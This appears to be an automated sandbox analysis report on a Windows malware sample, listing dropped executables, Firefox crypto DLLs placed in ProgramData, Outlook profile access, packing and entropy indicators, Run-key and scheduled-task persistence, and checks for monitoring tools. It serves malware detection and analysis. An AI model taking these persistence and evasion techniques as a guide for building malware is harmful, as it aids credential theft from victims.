Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winhttp.dll

Source: C:\Users\user\Desktop\8NjcvPNvUr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\compatibility.ini

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: 8NjcvPNvUr.exe

Static file information: File size 1955840 > 1048576

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: 8NjcvPNvUr.exe

Static PE information: Raw size of lybfcffv is bigger than: 0x100000 < 0x1ac000

Source:	Binary string: mozglue.pdbP source: 8ec8c5c339.exe, 00000008.00000002.2779820705.000000006C23D000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: nss3.pdb@ source: 8ec8c5c339.exe, 00000008.00000002.2780920957.000000006C3FF000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: "description": "The name of the library's debug file. For example, 'xul.pdb" source: firefox.exe, 00000023.00000002.3334627067.0000028631D33000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb source: 8ec8c5c339.exe, 00000008.00000002.2780920957.000000006C3FF000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: mozglue.pdb source: 8ec8c5c339.exe, 00000008.00000002.2779820705.000000006C23D000.00000002.00000001.01000000.0000000C.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Unpacked PE file: 0.2.8NjcvPNvUr.exe.250000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lybfcffv:EW;emchirzz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lybfcffv:EW;emchirzz:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Unpacked PE file: 1.2.explorti.exe.310000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lybfcffv:EW;emchirzz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lybfcffv:EW;emchirzz:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Unpacked PE file: 2.2.explorti.exe.310000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lybfcffv:EW;emchirzz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lybfcffv:EW;emchirzz:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Unpacked PE file: 7.2.explorti.exe.310000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lybfcffv:EW;emchirzz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lybfcffv:EW;emchirzz:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Unpacked PE file: 9.2.1c593ec106.exe.390000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.rsrc:R;Unknown_Section6:EW;.data:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:R;.rsrc:R;Unknown_Section6:EW;.data:EW;
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Unpacked PE file: 10.2.8ec8c5c339.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.casiwid:R;.mufu:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Unpacked PE file: 12.2.1c593ec106.exe.390000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.rsrc:R;Unknown_Section6:EW;.data:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:R;.rsrc:R;Unknown_Section6:EW;.data:EW;
Source: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe	Unpacked PE file: 15.2.RoamingHJDBKJKFIE.exe.c30000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lybfcffv:EW;emchirzz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lybfcffv:EW;emchirzz:EW;.taggant:EW;
Source: C:\Users\userKFHCAEGCBF.exe	Unpacked PE file: 18.2.userKFHCAEGCBF.exe.c10000.0.unpack :EW;.rsrc:W;.idata :W; :EW;finyobjn:EW;cveoqpqu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;finyobjn:EW;cveoqpqu:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 19.2.axplong.exe.160000.0.unpack :EW;.rsrc:W;.idata :W; :EW;finyobjn:EW;cveoqpqu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;finyobjn:EW;cveoqpqu:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Unpacked PE file: 30.2.8ec8c5c339.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.casiwid:R;.mufu:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Unpacked PE file: 31.2.1c593ec106.exe.390000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.rsrc:R;Unknown_Section6:EW;.data:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:R;.rsrc:R;Unknown_Section6:EW;.data:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 37.2.axplong.exe.160000.0.unpack :EW;.rsrc:W;.idata :W; :EW;finyobjn:EW;cveoqpqu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;finyobjn:EW;cveoqpqu:EW;.taggant:EW;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Unpacked PE file: 10.2.8ec8c5c339.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Unpacked PE file: 30.2.8ec8c5c339.exe.400000.0.unpack

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe

Code function: 8_2_0041BA2C LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

8_2_0041BA2C

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

PE file contains an invalid checksum

Source: 8NjcvPNvUr.exe	Static PE information: real checksum: 0x1e73b4 should be: 0x1e21d9
Source: random[1].exe.8.dr	Static PE information: real checksum: 0x1e73b4 should be: 0x1e21d9
Source: explorti.exe.0.dr	Static PE information: real checksum: 0x1e73b4 should be: 0x1e21d9
Source: 1c593ec106.exe.7.dr	Static PE information: real checksum: 0x12ca13 should be: 0x314e69
Source: userKFHCAEGCBF.exe.8.dr	Static PE information: real checksum: 0x1d5ef2 should be: 0x1cd7cd
Source: random[1].exe0.8.dr	Static PE information: real checksum: 0x1d5ef2 should be: 0x1cd7cd
Source: random[1].exe0.7.dr	Static PE information: real checksum: 0x12ca13 should be: 0x314e69
Source: RoamingHJDBKJKFIE.exe.8.dr	Static PE information: real checksum: 0x1e73b4 should be: 0x1e21d9
Source: axplong.exe.18.dr	Static PE information: real checksum: 0x1d5ef2 should be: 0x1cd7cd

PE file contains sections with non-standard names

Source: 8NjcvPNvUr.exe	Static PE information: section name:
Source: 8NjcvPNvUr.exe	Static PE information: section name: .idata
Source: 8NjcvPNvUr.exe	Static PE information: section name:
Source: 8NjcvPNvUr.exe	Static PE information: section name: lybfcffv
Source: 8NjcvPNvUr.exe	Static PE information: section name: emchirzz
Source: 8NjcvPNvUr.exe	Static PE information: section name: .taggant
Source: explorti.exe.0.dr	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name: .idata
Source: explorti.exe.0.dr	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name: lybfcffv
Source: explorti.exe.0.dr	Static PE information: section name: emchirzz
Source: explorti.exe.0.dr	Static PE information: section name: .taggant
Source: random[1].exe.7.dr	Static PE information: section name: .casiwid
Source: random[1].exe.7.dr	Static PE information: section name: .mufu
Source: 8ec8c5c339.exe.7.dr	Static PE information: section name: .casiwid
Source: 8ec8c5c339.exe.7.dr	Static PE information: section name: .mufu
Source: random[1].exe0.7.dr	Static PE information: section name:
Source: random[1].exe0.7.dr	Static PE information: section name:
Source: random[1].exe0.7.dr	Static PE information: section name:
Source: random[1].exe0.7.dr	Static PE information: section name:
Source: random[1].exe0.7.dr	Static PE information: section name:
Source: random[1].exe0.7.dr	Static PE information: section name:
Source: 1c593ec106.exe.7.dr	Static PE information: section name:
Source: 1c593ec106.exe.7.dr	Static PE information: section name:
Source: 1c593ec106.exe.7.dr	Static PE information: section name:
Source: 1c593ec106.exe.7.dr	Static PE information: section name:
Source: 1c593ec106.exe.7.dr	Static PE information: section name:
Source: 1c593ec106.exe.7.dr	Static PE information: section name:
Source: freebl3.dll.8.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.8.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.8.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.8.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.8.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.8.dr	Static PE information: section name: .didat
Source: nss3.dll.8.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.8.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.8.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.8.dr	Static PE information: section name: .00cfg
Source: random[1].exe.8.dr	Static PE information: section name:
Source: random[1].exe.8.dr	Static PE information: section name: .idata
Source: random[1].exe.8.dr	Static PE information: section name:
Source: random[1].exe.8.dr	Static PE information: section name: lybfcffv
Source: random[1].exe.8.dr	Static PE information: section name: emchirzz
Source: random[1].exe.8.dr	Static PE information: section name: .taggant
Source: RoamingHJDBKJKFIE.exe.8.dr	Static PE information: section name:
Source: RoamingHJDBKJKFIE.exe.8.dr	Static PE information: section name: .idata
Source: RoamingHJDBKJKFIE.exe.8.dr	Static PE information: section name:
Source: RoamingHJDBKJKFIE.exe.8.dr	Static PE information: section name: lybfcffv
Source: RoamingHJDBKJKFIE.exe.8.dr	Static PE information: section name: emchirzz
Source: RoamingHJDBKJKFIE.exe.8.dr	Static PE information: section name: .taggant
Source: userKFHCAEGCBF.exe.8.dr	Static PE information: section name:
Source: userKFHCAEGCBF.exe.8.dr	Static PE information: section name: .idata
Source: userKFHCAEGCBF.exe.8.dr	Static PE information: section name:
Source: userKFHCAEGCBF.exe.8.dr	Static PE information: section name: finyobjn
Source: userKFHCAEGCBF.exe.8.dr	Static PE information: section name: cveoqpqu
Source: userKFHCAEGCBF.exe.8.dr	Static PE information: section name: .taggant
Source: random[1].exe0.8.dr	Static PE information: section name:
Source: random[1].exe0.8.dr	Static PE information: section name: .idata
Source: random[1].exe0.8.dr	Static PE information: section name:
Source: random[1].exe0.8.dr	Static PE information: section name: finyobjn
Source: random[1].exe0.8.dr	Static PE information: section name: cveoqpqu
Source: random[1].exe0.8.dr	Static PE information: section name: .taggant
Source: axplong.exe.18.dr	Static PE information: section name:
Source: axplong.exe.18.dr	Static PE information: section name: .idata
Source: axplong.exe.18.dr	Static PE information: section name:
Source: axplong.exe.18.dr	Static PE information: section name: finyobjn
Source: axplong.exe.18.dr	Static PE information: section name: cveoqpqu
Source: axplong.exe.18.dr	Static PE information: section name: .taggant

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_0032D84C push ecx; ret	7_2_0032D85F
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_0041A9F5 push ecx; ret	8_2_0041AA08
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1FB536 push ecx; ret	8_2_6C1FB549

Source: 8NjcvPNvUr.exe	Static PE information: section name: entropy: 7.987936779363103
Source: 8NjcvPNvUr.exe	Static PE information: section name: lybfcffv entropy: 7.954168133889622
Source: explorti.exe.0.dr	Static PE information: section name: entropy: 7.987936779363103
Source: explorti.exe.0.dr	Static PE information: section name: lybfcffv entropy: 7.954168133889622
Source: random[1].exe.7.dr	Static PE information: section name: .text entropy: 7.812950396957531
Source: 8ec8c5c339.exe.7.dr	Static PE information: section name: .text entropy: 7.812950396957531
Source: random[1].exe0.7.dr	Static PE information: section name: entropy: 7.999400097848481
Source: random[1].exe0.7.dr	Static PE information: section name: entropy: 7.99076230675352
Source: random[1].exe0.7.dr	Static PE information: section name: entropy: 7.999175266136623
Source: random[1].exe0.7.dr	Static PE information: section name: entropy: 7.964571388660085
Source: 1c593ec106.exe.7.dr	Static PE information: section name: entropy: 7.999400097848481
Source: 1c593ec106.exe.7.dr	Static PE information: section name: entropy: 7.99076230675352
Source: 1c593ec106.exe.7.dr	Static PE information: section name: entropy: 7.999175266136623
Source: 1c593ec106.exe.7.dr	Static PE information: section name: entropy: 7.964571388660085
Source: random[1].exe.8.dr	Static PE information: section name: entropy: 7.987936779363103
Source: random[1].exe.8.dr	Static PE information: section name: lybfcffv entropy: 7.954168133889622
Source: RoamingHJDBKJKFIE.exe.8.dr	Static PE information: section name: entropy: 7.987936779363103
Source: RoamingHJDBKJKFIE.exe.8.dr	Static PE information: section name: lybfcffv entropy: 7.954168133889622
Source: userKFHCAEGCBF.exe.8.dr	Static PE information: section name: entropy: 7.983363124481756
Source: userKFHCAEGCBF.exe.8.dr	Static PE information: section name: finyobjn entropy: 7.954291882741596
Source: random[1].exe0.8.dr	Static PE information: section name: entropy: 7.983363124481756
Source: random[1].exe0.8.dr	Static PE information: section name: finyobjn entropy: 7.954291882741596
Source: axplong.exe.18.dr	Static PE information: section name: entropy: 7.983363124481756
Source: axplong.exe.18.dr	Static PE information: section name: finyobjn entropy: 7.954291882741596

Drops PE files

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File created: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll	Jump to dropped file
Source: C:\Users\userKFHCAEGCBF.exe	File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Jump to dropped file
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File created: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File created: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File created: C:\Users\userKFHCAEGCBF.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 1c593ec106.exe			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8ec8c5c339.exe			Jump to behavior

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\userKFHCAEGCBF.exe	Window searched: window name: FilemonClass
Source: C:\Users\userKFHCAEGCBF.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\userKFHCAEGCBF.exe	Window searched: window name: RegmonClass
Source: C:\Users\userKFHCAEGCBF.exe	Window searched: window name: FilemonClass
Source: C:\Users\userKFHCAEGCBF.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS

Creates job files (autostart)

Source: C:\Users\user\Desktop\8NjcvPNvUr.exe

File created: C:\Windows\Tasks\explorti.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8ec8c5c339.exe	Jump to behavior
